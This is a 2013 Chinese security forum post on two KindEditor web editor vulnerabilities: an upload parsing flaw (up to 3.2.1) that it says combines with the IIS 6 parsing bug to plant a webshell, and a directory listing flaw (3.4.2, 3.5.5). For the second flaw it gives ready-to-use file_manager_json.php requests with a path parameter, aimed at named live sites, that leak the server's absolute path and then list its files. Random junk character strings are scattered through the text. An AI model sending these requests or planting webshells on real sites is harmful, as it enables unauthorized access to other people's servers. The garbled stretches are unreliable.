找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2147|回复: 0
打印 上一主题 下一主题

KindEditor上传解析漏洞和列目录漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-23 09:16:19 | 显示全部楼层 回帖奖励 |倒序浏览 |阅读模式
KindEditor上传解析漏洞 影响版本:= kindeditor 3.2.1(09年8月份发布的最新版) 漏洞利用:利用windows 2003 IIS解析漏洞拿WEBSHELL KindEditor列目录漏洞 测试版本:KindEditor 3.4.2 KindEditor 3.5.5 1.http://www.political-security.com/67cms/kindeditor/php/file_man6 @1 Y7 ?" l: d/ {  z; U5 \

1 a; i2 J# @9 y! c+ \. H

KindEditor上传解析漏洞

影响版本:<= kindeditor 3.2.1(09年8月份发布的最新版)

漏洞利用:利用windows 2003 IIS解析漏洞拿WEBSHELL

) Z1 f& s2 ~0 \0 l. y2 h

" t" f# U; ]8 S0 Q

KindEditor列目录漏洞

测试版本:KindEditor 3.4.2    KindEditor 3.5.5

  • http://www.political-security.com/67cms/kindeditor/php/file_manager_json.php?path=/
  • //path=/,爆出绝对路径D:AppServwww67cmskindeditorphpfile_manager_json.php
  • 2.http://netknight.in/67cms/kindeditor/php/file_manager_json.php?path=AppServ/www/67cms/
  • //根据爆出的绝对路径,修改path的值为AppServ/www/67cms/
  • 这时将遍历d:/AppServ/www/67cms/下的所有文件和文件名: @- I4 V1 s$ D4 g' n4 A

3 D, I" R" n  U# J- K" T3 F
9 m# `0 ^9 D+ {" |# O2 A

& E& ~) L8 I7 I4 \% a6 @4 D
. T' m! Z2 w% y, U) k! g+ ?

1 u7 s) f) o$ H7 a
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表